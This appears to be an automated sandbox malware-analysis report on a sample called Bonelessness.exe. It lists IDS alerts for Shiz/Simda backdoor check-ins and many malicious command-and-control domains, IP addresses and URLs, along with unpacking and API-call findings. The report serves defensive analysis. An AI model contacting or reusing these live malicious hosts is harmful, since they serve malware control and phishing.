Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz - Source IP: 18.208.156.248 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:01.747669+0200
SID:	2018141
Severity:	1
Source Port:	80
Destination Port:	49651
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 18.208.156.248 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:01.747669+0200
SID:	2037771
Severity:	1
Source Port:	80
Destination Port:	49651
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:47:04.673377+0200
SID:	2803437
Severity:	1
Source Port:	49660
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:47:04.673377+0200
SID:	2804852
Severity:	1
Source Port:	49660
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-23T18:48:28.799086+0200
SID:	2803437
Severity:	1
Source Port:	64290
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-23T18:48:28.799086+0200
SID:	2804852
Severity:	1
Source Port:	64290
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 15.197.240.20

Timestamp:	2024-08-23T18:48:39.716171+0200
SID:	2803437
Severity:	1
Source Port:	64299
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 15.197.240.20

Timestamp:	2024-08-23T18:48:39.716171+0200
SID:	2804852
Severity:	1
Source Port:	64299
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:48:59.233027+0200
SID:	2803437
Severity:	1
Source Port:	56386
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:48:59.233027+0200
SID:	2804852
Severity:	1
Source Port:	56386
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 103.224.182.252

Timestamp:	2024-08-23T18:48:36.639004+0200
SID:	2803437
Severity:	1
Source Port:	64301
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 103.224.182.252

Timestamp:	2024-08-23T18:48:36.639004+0200
SID:	2804852
Severity:	1
Source Port:	64301
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 64.225.91.73

Timestamp:	2024-08-23T18:47:38.185426+0200
SID:	2803437
Severity:	1
Source Port:	51124
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 64.225.91.73

Timestamp:	2024-08-23T18:47:38.185426+0200
SID:	2804852
Severity:	1
Source Port:	51124
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:48:26.313142+0200
SID:	2803437
Severity:	1
Source Port:	64292
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:48:26.313142+0200
SID:	2804852
Severity:	1
Source Port:	64292
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:47:19.476260+0200
SID:	2803437
Severity:	1
Source Port:	51112
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:47:19.476260+0200
SID:	2804852
Severity:	1
Source Port:	51112
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:47:49.946120+0200
SID:	2803437
Severity:	1
Source Port:	63308
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:47:49.946120+0200
SID:	2804852
Severity:	1
Source Port:	63308
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:48:36.973905+0200
SID:	2803437
Severity:	1
Source Port:	64303
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:48:36.973905+0200
SID:	2804852
Severity:	1
Source Port:	64303
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:47:51.546324+0200
SID:	2803437
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:47:51.546324+0200
SID:	2804852
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 15.197.240.20

Timestamp:	2024-08-23T18:48:50.293064+0200
SID:	2803437
Severity:	1
Source Port:	64306
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 15.197.240.20

Timestamp:	2024-08-23T18:48:50.293064+0200
SID:	2804852
Severity:	1
Source Port:	64306
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:48:59.339923+0200
SID:	2803437
Severity:	1
Source Port:	56390
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:48:59.339923+0200
SID:	2804852
Severity:	1
Source Port:	56390
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:47:54.165366+0200
SID:	2803437
Severity:	1
Source Port:	49660
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:47:54.165366+0200
SID:	2804852
Severity:	1
Source Port:	49660
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:47:25.891710+0200
SID:	2803437
Severity:	1
Source Port:	49662
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:47:25.891710+0200
SID:	2804852
Severity:	1
Source Port:	49662
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:47:01.518998+0200
SID:	2803437
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:47:01.518998+0200
SID:	2804852
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:48:31.622568+0200
SID:	2803437
Severity:	1
Source Port:	64289
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:48:31.622568+0200
SID:	2804852
Severity:	1
Source Port:	64289
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 5.79.71.225

Timestamp:	2024-08-23T18:48:23.528835+0200
SID:	2803437
Severity:	1
Source Port:	64288
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 5.79.71.225

Timestamp:	2024-08-23T18:48:23.528835+0200
SID:	2804852
Severity:	1
Source Port:	64288
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-23T18:48:24.959067+0200
SID:	2804852
Severity:	1
Source Port:	64293
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	2024-08-23T18:47:02.370944+0200
SID:	2804852
Severity:	1
Source Port:	49656
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:47:02.126233+0200
SID:	2804852
Severity:	1
Source Port:	49654
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:47:17.469876+0200
SID:	2803437
Severity:	1
Source Port:	51112
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:47:17.469876+0200
SID:	2804852
Severity:	1
Source Port:	51112
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 69.162.80.60

Timestamp:	2024-08-23T18:47:52.109062+0200
SID:	2803437
Severity:	1
Source Port:	64275
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 69.162.80.60

Timestamp:	2024-08-23T18:47:52.109062+0200
SID:	2804852
Severity:	1
Source Port:	64275
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:49:01.672638+0200
SID:	2803437
Severity:	1
Source Port:	56399
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:49:01.672638+0200
SID:	2804852
Severity:	1
Source Port:	56399
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:48:35.640695+0200
SID:	2803437
Severity:	1
Source Port:	64297
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:48:35.640695+0200
SID:	2804852
Severity:	1
Source Port:	64297
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:48:57.938393+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	53545
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Bonelessness.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://lyrysor.com/login.php	Avira URL Cloud: Label: phishing
Source: http://gadyniw.com/login.phpMy	Avira URL Cloud: Label: malware
Source: http://lyvyxor.com/login.php	Avira URL Cloud: Label: malware
Source: http://galynuh.com/login.php.	Avira URL Cloud: Label: malware
Source: http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsEGsOf%2BBeruClQxv	Avira URL Cloud: Label: malware
Source: http://puzylyp.com/login.php	Avira URL Cloud: Label: malware
Source: http://vojyqem.com/login.phpTemp	Avira URL Cloud: Label: malware
Source: http://galynuh.com/login.php	Avira URL Cloud: Label: malware
Source: http://lyxynyx.com/login.php	Avira URL Cloud: Label: malware
Source: http://InquiryGrid.com/sk-domsale.php?dom=galyqaz.com&eds=YnJva2VyYWdlQHNrZW56by5jb20%3D&_isk_=7444&	Avira URL Cloud: Label: malware
Source: http://qetyhyg.com/login.php	Avira URL Cloud: Label: phishing
Source: http://lymyxid.com/login.php	Avira URL Cloud: Label: malware
Source: http://galyqaz.com/display.cfm	Avira URL Cloud: Label: malware
Source: http://vojyqem.com/login.php	Avira URL Cloud: Label: malware
Source: http://puzylyp.com/login.phpMy	Avira URL Cloud: Label: malware
Source: http://qegyval.com/login.php	Avira URL Cloud: Label: malware
Source: http://vocyzit.com/login	Avira URL Cloud: Label: malware
Source: http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229cco	Avira URL Cloud: Label: malware
Source: http://gadyniw.com/login.php	Avira URL Cloud: Label: malware
Source: http://pupydeq.com/login.php	Avira URL Cloud: Label: malware
Source: http://lygyvuj.com/login.php	Avira URL Cloud: Label: phishing
Source: http://gadyciz.com/login.php	Avira URL Cloud: Label: malware
Source: http://galyqaz.com/Computerspiele.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4D	Avira URL Cloud: Label: malware
Source: http://ww3.galyqaz.com/	Avira URL Cloud: Label: phishing
Source: http://galyqaz.com/Networking_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52ya	Avira URL Cloud: Label: malware
Source: https://qegyhig.com//	Avira URL Cloud: Label: malware
Source: http://gadyniw.com/login.php3	Avira URL Cloud: Label: malware
Source: http://galyqaz.com/IT_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2o	Avira URL Cloud: Label: malware
Source: http://www.gahyqah.com/login.phpP	Avira URL Cloud: Label: malware
Source: http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cC	Avira URL Cloud: Label: malware
Source: http://gatyhub.com/login.php	Avira URL Cloud: Label: malware
Source: http://lyvyxor.com/login.php_L	Avira URL Cloud: Label: malware
Source: http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181	Avira URL Cloud: Label: malware
Source: https://lysyvan.com/	Avira URL Cloud: Label: malware
Source: http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c	Avira URL Cloud: Label: malware
Source: https://lysyvan.com/wp-json/	Avira URL Cloud: Label: malware
Source: http://qegyhig.com/login.phpAppData	Avira URL Cloud: Label: malware
Source: http://lysyfyj.com/login.php	Avira URL Cloud: Label: malware
Source: http://galyqaz.com/Search_Engine_Ranking.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52	Avira URL Cloud: Label: malware
Source: http://vocyzit.com/login.php	Avira URL Cloud: Label: malware
Source: http://galyqaz.com/login.php	Avira URL Cloud: Label: malware
Source: http://www.gahyqah.com/login.php	Avira URL Cloud: Label: malware
Source: https://qegyhig.com/wp-json/	Avira URL Cloud: Label: malware
Source: http://gatyfus.com/login.phpd%	Avira URL Cloud: Label: malware
Source: http://gatyfus.com/login.php	Avira URL Cloud: Label: malware
Source: http://galyqaz.com/login.php0	Avira URL Cloud: Label: malware
Source: https://qegyhig.com/login.php	Avira URL Cloud: Label: malware
Source: https://qegyhig.com/	Avira URL Cloud: Label: malware
Source: http://lysyvan.com/login.php	Avira URL Cloud: Label: malware
Source: http://ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7	Avira URL Cloud: Label: malware
Source: http://qetyfuv.com/login.php	Avira URL Cloud: Label: malware
Source: http://qexyhuv.com/login.php	Avira URL Cloud: Label: malware
Source: http://vonypom.com/login.php	Avira URL Cloud: Label: malware
Source: http://pupycag.com/login.php	Avira URL Cloud: Label: phishing
Source: http://vofycot.com/login.php	Avira URL Cloud: Label: malware
Source: http://ww16.vofycot.com/login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4	Avira URL Cloud: Label: malware
Source: https://qegyhig.com/login.phpgpage.namecheap.com;::ffff:91.195.240.19;	Avira URL Cloud: Label: malware
Source: http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2oyV	Avira URL Cloud: Label: malware
Source: http://ww3.galyqaz.com/DigiCert	Avira URL Cloud: Label: phishing
Source: http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181co	Avira URL Cloud: Label: malware
Source: https://qegyhig.com/m/	Avira URL Cloud: Label: malware
Source: https://lysyvan.com/login.php	Avira URL Cloud: Label: malware
Source: http://gadyniw.com/login.php/	Avira URL Cloud: Label: malware
Source: http://qegyhig.com/login.php	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Bonelessness.exe

ReversingLabs: Detection: 95%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: Bonelessness.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Unpacked PE file: 5.2.JbrLYfXaOpqnSngA.exe.2890000.3.unpack
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Unpacked PE file: 6.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Unpacked PE file: 21.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Unpacked PE file: 35.2.JbrLYfXaOpqnSngA.exe.3290000.3.unpack
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Unpacked PE file: 39.2.JbrLYfXaOpqnSngA.exe.2940000.3.unpack

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Bonelessness.exe	Unpacked PE file: 0.2.Bonelessness.exe.400000.1.unpack
Source: C:\Windows\apppatch\svchost.exe	Unpacked PE file: 1.2.svchost.exe.400000.1.unpack

Source: Bonelessness.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49654 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49661 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:51114 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:51121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:64278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:64286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:64293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:64296 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:56397 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:56400 version: TLS 1.2

Source:

Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JbrLYfXaOpqnSngA.exe, 00000005.00000000.2010181534.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000006.00000002.2204828700.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000000.2011823970.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2205428505.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2045473414.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000000.2033627529.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000000.2049314885.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000017.00000000.2052075922.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000019.00000000.2055014446.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 0000001B.00000000.2059375961.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 0000001D.00000000.2060402527.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 0000001F.00000000.2072104638.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000021.00000002.2079267989.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000023.00000000.2077051462.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000025.00000000.2081215028.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp, JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089000932.0000000000E1E000.00000002.00000001.01000000.00000009.sdmp

Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D3E1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	1_2_02D3E1B0
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D4D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	1_2_02D4D638
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D49460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	1_2_02D49460
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D3CC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	1_2_02D3CC10
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D27400 PathFileExistsA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	1_2_02D27400
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D4D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	1_2_02D4D5A0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028AE1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	5_2_028AE1B0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028BD638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	5_2_028BD638
